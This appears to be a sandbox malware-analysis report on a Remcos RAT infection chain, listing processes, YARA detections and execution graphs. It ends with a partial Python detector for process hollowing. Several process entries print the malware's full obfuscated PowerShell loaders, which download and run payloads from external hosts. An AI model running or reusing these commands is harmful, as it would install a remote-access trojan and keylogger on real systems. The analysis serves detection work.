Commandline: POWershEll -eX BYPaSS -nop -W 1 -c DEvIceCredeNTIALdepLoYMeNT ; invOKE-ExPreSSiOn($(InVOKE-EXPResSioN('[sYSTeM.TEXt.eNcOdINg]'+[CHaR]0x3A+[Char]58+'UTf8.getSTriNG([SYsTEM.CONVeRt]'+[ChaR]58+[ChaR]0X3a+'fROMBAse64StRING('+[chaR]34+'JFhVVUxxNFNWUVBUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHF0T0F2SHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdZRkVWdVpJcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhneU1abVpWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBocWZKb1lkbEduKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6TUJpbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBseHlEbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYVVVMcTRTVlFQVDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzc0LjIwOC44MC4yNDgvNDMvc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))"
Imagebase: 0x370000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 01:22:00
Start date: 17/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline"
Imagebase: 0xb40000
File size: 2'141'552 bytes
MD5 hash: EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 5
Start time: 01:22:00
Start date: 17/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES207F.tmp" "c:\Users\user\AppData\Local\Temp\bxb5o0my\CSC331954E1B244EC883461F7D54BF3FA4.TMP"
Imagebase: 0xe50000
File size: 46'832 bytes
MD5 hash: 70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 7
Start time: 01:22:06
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seewhatiamdoingforyouwithgreatnessthingsgivenmeb.vbS"
                                                                                                          Imagebase:0x550000
                                                                                                          File size:147'456 bytes
                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:01:22:07
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $combo = 'JGNhbXBlc3QgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcmVkb3VidGVkID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcHljbmlkID0gJHJlZG91YnRlZC5Eb3dubG9hZERhdGEoJGNhbXBlc3QpOyRvcmFjdWxvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcHljbmlkKTskbGFsbGF0aW9uID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRkZXN0ZW1zID0gJzw8QkFTRTY0X0VORD4+Jzskc2NhcHVsZXQgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGxhbGxhdGlvbik7JGh5ZHJvZWxlY3RyaWMgPSAkb3JhY3Vsb3VzLkluZGV4T2YoJGRlc3RlbXMpOyRzY2FwdWxldCAtZ2UgMCAtYW5kICRoeWRyb2VsZWN0cmljIC1ndCAkc2NhcHVsZXQ7JHNjYXB1bGV0ICs9ICRsYWxsYXRpb24uTGVuZ3RoOyRwYWlsbWFpbCA9ICRoeWRyb2VsZWN0cmljIC0gJHNjYXB1bGV0OyRoYWdyaWRlcyA9ICRvcmFjdWxvdXMuU3Vic3RyaW5nKCRzY2FwdWxldCwgJHBhaWxtYWlsKTskc3VwZXJsaW5lYXIgPSAtam9pbiAoJGhhZ3JpZGVzLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRoYWdyaWRlcy5MZW5ndGgpXTskdHVya2lzaG5lc3MgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRzdXBlcmxpbmVhcik7JGFtcGhpZ2VuaWEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0dXJraXNobmVzcyk7JHRlbGlmZXJhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHRlbGlmZXJhLkludm9rZSgkbnVsbCwgQCgnMC9uS050My9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHJldmFuY2hpc3RzJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCAnQ2FzUG9sJywgJyRyZXZhbmNoaXN0cycsICckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCckcmV2YW5jaGlzdHMnLCcxJywnJHJldmFuY2hpc3RzJywnJykpOw==';$prason = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($combo));Invoke-Expression $prason
                                                                                                          Imagebase:0x370000
                                                                                                          File size:433'152 bytes
                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:9
                                                                                                          Start time:01:22:07
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff66e660000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Target ID:12
                                                                                                          Start time:01:22:34
                                                                                                          Start date:17/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                          Imagebase:0xe20000
                                                                                                          File size:108'664 bytes
                                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2124563594.0000000006750000.00000010.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6750000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fb02d1b160cfa5c8e923864d96424c57270382bf332d1949e248403fa8389f5e
                                                                                                            • Instruction ID: 30442647d4823dc3da03d1a86f8b17c1bdb09f5659435f2c71bf82ef17b45e5d
                                                                                                            • Opcode Fuzzy Hash: fb02d1b160cfa5c8e923864d96424c57270382bf332d1949e248403fa8389f5e
                                                                                                            • Instruction Fuzzy Hash: 6701F771E003019FEB518FA888D17EE7BF99F0D720F190469EA04EB241E2B4598287A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000003.2124586557.0000000006390000.00000010.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_3_6390000_mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                            • Instruction ID: 34063178c4b53982239d05e021104c81accd771b5c6240d5847af7ba48689247
                                                                                                            • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                            • Instruction Fuzzy Hash:

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:4.5%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:71
                                                                                                            Total number of Limit Nodes:11
                                                                                                            execution_graph 10190 47c7480 10191 47c75fe 10190->10191 10192 47c74be 10190->10192 10192->10191 10199 47c7da8 10192->10199 10204 47c7c45 10192->10204 10213 47c7a08 10192->10213 10223 47c7a18 10192->10223 10233 47c77e8 10192->10233 10193 47c75df 10200 47c7cf9 10199->10200 10200->10199 10243 7204610 10200->10243 10252 72045ac 10200->10252 10262 72045f4 10200->10262 10205 47c7b9a 10204->10205 10209 47c7c5e 10204->10209 10205->10204 10206 47c7de8 URLDownloadToFileW 10205->10206 10208 47c7ea8 10206->10208 10208->10193 10210 7204610 4 API calls 10209->10210 10211 72045f4 4 API calls 10209->10211 10212 72045ac 4 API calls 10209->10212 10210->10209 10211->10209 10212->10209 10218 47c7a18 10213->10218 10214 47c7de8 URLDownloadToFileW 10217 47c7ea8 10214->10217 10215 47c7b30 10215->10193 10217->10193 10218->10214 10218->10215 10219 47c7c5e 10218->10219 10220 7204610 4 API calls 10219->10220 10221 72045f4 4 API calls 10219->10221 10222 72045ac 4 API calls 10219->10222 10220->10219 10221->10219 10222->10219 10224 47c7a4c 10223->10224 10225 47c7de8 URLDownloadToFileW 10224->10225 10226 47c7b30 10224->10226 10229 47c7c5e 10224->10229 10228 47c7ea8 10225->10228 10226->10193 10228->10193 10230 7204610 4 API calls 10229->10230 10231 72045f4 4 API calls 10229->10231 10232 72045ac 4 API calls 10229->10232 10230->10229 10231->10229 10232->10229 10238 47c77ed 10233->10238 10234 47c7de8 URLDownloadToFileW 10237 47c7ea8 10234->10237 10235 47c7b30 10235->10193 10237->10193 10238->10234 10238->10235 10239 47c7c5e 10238->10239 10240 7204610 4 API calls 10239->10240 10241 72045f4 4 API calls 10239->10241 10242 72045ac 4 API calls 10239->10242 10240->10239 10241->10239 10242->10239 10244 7204a93 10243->10244 10245 7204641 10243->10245 10244->10200 10245->10244 10247 47c77e8 5 API calls 10245->10247 10248 47c7a18 5 API calls 10245->10248 10249 47c7a08 5 API calls 10245->10249 10250 47c7c45 5 API calls 10245->10250 10271 47c7e00 10245->10271 10246 7204a34 10246->10200 10247->10246 10248->10246 10249->10246 10250->10246 10253 72045c6 10252->10253 10254 7204633 10252->10254 10253->10200 10255 7204a93 10254->10255 10257 47c77e8 5 API calls 10254->10257 10258 47c7a18 5 API calls 10254->10258 10259 47c7a08 5 API calls 10254->10259 10260 47c7c45 5 API calls 10254->10260 10261 47c7e00 URLDownloadToFileW 10254->10261 10255->10200 10256 7204a34 10256->10200 10257->10256 10258->10256 10259->10256 10260->10256 10261->10256 10263 7204a93 10262->10263 10264 7204641 10262->10264 10263->10200 10264->10263 10266 47c77e8 5 API calls 10264->10266 10267 47c7a18 5 API calls 10264->10267 10268 47c7a08 5 API calls 10264->10268 10269 47c7c45 5 API calls 10264->10269 10270 47c7e00 URLDownloadToFileW 10264->10270 10265 7204a34 10265->10200 10266->10265 10267->10265 10268->10265 10269->10265 10270->10265 10272 47c7e4b URLDownloadToFileW 10271->10272 10274 47c7ea8 10272->10274 10274->10246

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
Control-flow graph of the function at 47c7a18 (graph image not reproduced; executed/not-executed block colouring lost in extraction). Recoverable from the graph: a URLDownloadToFileW call in block 47c7e71-47c7ea6, and calls from 47c7d55 to 7204610, 72045f4 and 72045ac.
Memory Dump Source
• Source File: 00000003.00000002.2229076821.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_47c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7624fc9947d0db0fd4fc9635f48b77fda82c384754d77964cd54090a4dac81d6
• Instruction ID: ea8ac8de6e0d83eaf9807dc0971711f1dedb4790a23cc0b009c6cbd8489cabc7
• Opcode Fuzzy Hash: 7624fc9947d0db0fd4fc9635f48b77fda82c384754d77964cd54090a4dac81d6
• Instruction Fuzzy Hash: 50E1EA75A0021AEFDB15CF98D584A9EBBB2FF88310F24815DE804AB351DB75AD91CF90

Control-flow Graph

Control-flow graph of the function at 47c7e00 (graph image not reproduced; executed/not-executed block colouring lost in extraction). Recoverable from the graph: a URLDownloadToFileW call in block 47c7e71-47c7ea6.
APIs
• URLDownloadToFileW.URLMON(?,00000000,00000008,?,?), ref: 047C7E99
Memory Dump Source
• Source File: 00000003.00000002.2229076821.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_47c0000_powershell.jbxd
Similarity
• API ID: DownloadFile
• String ID:
• API String ID: 1407266417-0
• Opcode ID: fc961499814a56a9487b433b83335de11b65c3a2e6b68422e0724c3e1f07f3c0
• Instruction ID: 877429e136ad101bd2a10bb0fcae0fddd61595203146fa5cbaaea5f851531045
• Opcode Fuzzy Hash: fc961499814a56a9487b433b83335de11b65c3a2e6b68422e0724c3e1f07f3c0
• Instruction Fuzzy Hash: 4E21E4B6D0165ADFCB04CF99D984ADEFBB4FB48710F10852AE918A7310D774AA54CFA0

Control-flow Graph

Control-flow graph of the function at 7201f40 (graph image not reproduced; executed/not-executed block colouring lost in extraction). No API calls are annotated in this graph.
Memory Dump Source
• Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d52b240f11e37ac3f56df57eaf0955c3b0481222eec4781e89230f350bab342
• Instruction ID: b4bfb80f265c6701090a30165a8d19d2478b36e18d1ca8174dfdfae7b167f55e
• Opcode Fuzzy Hash: 3d52b240f11e37ac3f56df57eaf0955c3b0481222eec4781e89230f350bab342
• Instruction Fuzzy Hash: 331204B1B24216CFDB158B68881876ABBE2AFD2210F14807BD905DB6D2DB71C945C7F2

Control-flow Graph

Control-flow graph of the function at 7204610 (graph image not reproduced; executed/not-executed block colouring lost in extraction). Recoverable from the graph: calls from 7204a2f to 47c77e8, 47c7a18, 47c7a08, 47c7c45 and 47c7e00.
Memory Dump Source
• Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 598ae9c5a150849bf3b41e2d5f15daae071f8c1efb6532287a538be58fc302ac
• Instruction ID: 5d6562af092d402cb79da8fc81029e4d7684f2076de0e4b022d65eeeb0b42b89
• Opcode Fuzzy Hash: 598ae9c5a150849bf3b41e2d5f15daae071f8c1efb6532287a538be58fc302ac
• Instruction Fuzzy Hash: C8F128B0B10246EFDB149F68C414B6ABBA2EFC6310F24C569EA059B395DB71DC41CBE1

Control-flow Graph

Control-flow graph of the function at 72045f4 (graph image not reproduced; executed/not-executed block colouring lost in extraction). Recoverable from the graph: calls from 7204a2f to 47c77e8, 47c7a18, 47c7a08, 47c7c45 and 47c7e00.
Memory Dump Source
• Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9d70dd395987258e9e0d05d66af1051ac2408b1f0057985cb7d222351c7f31a8
• Instruction ID: b2473244a1fd51b8ad0a7c9e958569ca3147abb17cd10d754f846623a6b9ceb9
• Opcode Fuzzy Hash: 9d70dd395987258e9e0d05d66af1051ac2408b1f0057985cb7d222351c7f31a8
• Instruction Fuzzy Hash: 9591E2B0A20286DFCB14DF58C514B69BBB2BF86710F14C569EA059B396D772EC40CBE1

Control-flow Graph

Control-flow graph of the function at 72045ac (graph image not reproduced; executed/not-executed block colouring lost in extraction). Recoverable from the graph: calls from 7204a2f to 47c77e8, 47c7a18, 47c7a08, 47c7c45 and 47c7e00.
Memory Dump Source
• Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2da8087a6fd062ec0acfa06014202469aef4a3852d6fe17253b6f2a00dfb6791
• Instruction ID: d96697605b6254fe4ca019f22cd4288712c3cb40241e10340bbdd81c44423c17
• Opcode Fuzzy Hash: 2da8087a6fd062ec0acfa06014202469aef4a3852d6fe17253b6f2a00dfb6791
• Instruction Fuzzy Hash: 6891F6F0A20286DFCB149F58C514B29B7B2BF86710F14C569DA059B396D772EC80CBE1

Control-flow Graph

Control-flow graph of the function at 72004f8 (graph image not reproduced; executed/not-executed block colouring lost in extraction). No API calls are annotated in this graph.
Memory Dump Source
• Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4bad3c4d27cf3bf22b9a3376effcec592afe8972f90f69cfb9dc98df4d6b0226
• Instruction ID: 5076c377894447215df39139c20866efbb8115edc07f8c1ebd1aec27652dfca2
• Opcode Fuzzy Hash: 4bad3c4d27cf3bf22b9a3376effcec592afe8972f90f69cfb9dc98df4d6b0226
• Instruction Fuzzy Hash: FA513CB5B10215AFEB208B688810B2ABFA6EFC5714F14842AE545DF3C6CA71DC4587F1

Control-flow Graph

Control-flow graph of the function at 7201f24 (graph image not reproduced; executed/not-executed block colouring lost in extraction). No API calls are annotated in this graph.
Memory Dump Source
• Source File: 00000003.00000002.2233609066.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7200000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 81082f46c3350776d3722a3698f8c188960bb638c8577977fa336ef770045efa
• Instruction ID: 4ac04fa34373f52b9dc5e26b97560d4863f75cd8c079678956585b790142baf0
• Opcode Fuzzy Hash: 81082f46c3350776d3722a3698f8c188960bb638c8577977fa336ef770045efa
• Instruction Fuzzy Hash: DA41E6F0A24303DFCB108B14894866ABBF2FF91750B5581A6DA04EB2D3D771D944C7B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2228652133.000000000462D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0462D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_462d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48082b17747ad89cfdbbfef87fa5fb57362828dc522191d76a56c31865a13cba
                                                                                                            • Instruction ID: be58d1410a8b8aabb479fab567d4bfdc1752eedc49b7e417e506ef25587e9b33
                                                                                                            • Opcode Fuzzy Hash: 48082b17747ad89cfdbbfef87fa5fb57362828dc522191d76a56c31865a13cba
                                                                                                            • Instruction Fuzzy Hash: 4F012B71505750FAE7104F25EE80B67BF98DF51364F08C01ADD484F262E7B8A842CEB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2228652133.000000000462D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0462D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_462d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c7282f100ae9ff02c8b1f96c4433a9e29d4aa970e79ada172b2b812e976704a6
                                                                                                            • Instruction ID: d96eb2a7e432f8118e5567915641fcd284ee90a754a4c92bd817b3abe3e7e203
                                                                                                            • Opcode Fuzzy Hash: c7282f100ae9ff02c8b1f96c4433a9e29d4aa970e79ada172b2b812e976704a6
                                                                                                            • Instruction Fuzzy Hash: EA01407240E3D09FE7128B25D994B56BFB4DF53224F19C1CBD9888F2A3C2695844CB72

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:6.8%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:60
                                                                                                            Total number of Limit Nodes:16
                                                                                                             • Call chain recovered from the execution graph (function entries in lowercase hex as in the graph nodes): 2e181a7 -> 2e1817e -> 2e1bd2f (8 API calls; re-entered from 2e1bd48 via 2e1bdd0 -> 2e1be52) -> 2e1bd6e -> CreateProcessW (wrapper 2e175a4 -> 2e1ca20) -> 2e1bf59 -> Wow64SetThreadContext (wrapper 2e175b0 -> 2e1cc60) -> 2e1c03a -> VirtualAllocEx (2e1c1dc) -> 2e1c225 -> VirtualAllocEx (2e1c2d2) -> 2e1c319 -> WriteProcessMemory (wrapper 2e175c8 -> 2e1d1d8) -> 2e1c363 -> WriteProcessMemory (loops back to 2e1c363) -> 2e1c56f -> WriteProcessMemory -> 2e1c5b7 -> Wow64SetThreadContext (wrapper 2e175d4 -> 2e1cc60) -> 2e1c66e -> ResumeThread (2e1c683)
                                                                                                             • The failure edge of each stage from 2e1c03a onward leads either to 2e1c6c3, which calls CreateProcessW again (2e1cb05), or to 2e1c6de, which returns to 2e182f2 / 2e1bd48
                                                                                                             • Both Wow64SetThreadContext wrappers (2e175b0 and 2e175d4) resolve to the same stub at 2e1cc60
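The API order in the execution graph of the PowerShell-hosted stage (process 8): CreateProcessW, Wow64SetThreadContext, two VirtualAllocEx calls, repeated WriteProcessMemory, a second Wow64SetThreadContext and ResumeThread, is the process-hollowing (RunPE) sequence: a new process is created, the payload is written into it, the thread's context is rewritten so it starts in the injected image, and the thread is resumed. The Python below is an added detection example, not Joe Sandbox or Remcos code. It parses entries in the "Name.MODULE(args), ref: addr" layout of this report's APIs lists and matches them against an ordered stage model of the chain; the first trace is constructed from the entries on this page in the order the execution graph shows, the second is a constructed CreateRemoteThread injection that must not match. Because the sandbox prints "?" for the handles, the matcher keys on order alone; in endpoint telemetry you would additionally require that every call after CreateProcess targets the process handle or PID that CreateProcess returned. The stage labels and the NT-native aliases are my assumptions.

```python
"""Order-based detector for the process-hollowing API sequence.

Added example (not part of the Joe Sandbox report). Input lines follow the
"Name.MODULE(args), ref: addr" layout of the report's APIs lists.
"""
import re
from typing import List, Optional, Tuple

# Ordered stages of the hollowing chain: (label, accepted API names, optional).
# NT-native names are included as aliases (assumption: same role as the Win32
# call). A context read/set before the allocation is accepted as an optional
# stage because this sample calls Wow64SetThreadContext before VirtualAllocEx.
STAGES = [
    ("create_process", {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}, False),
    ("unmap_image",    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},               True),
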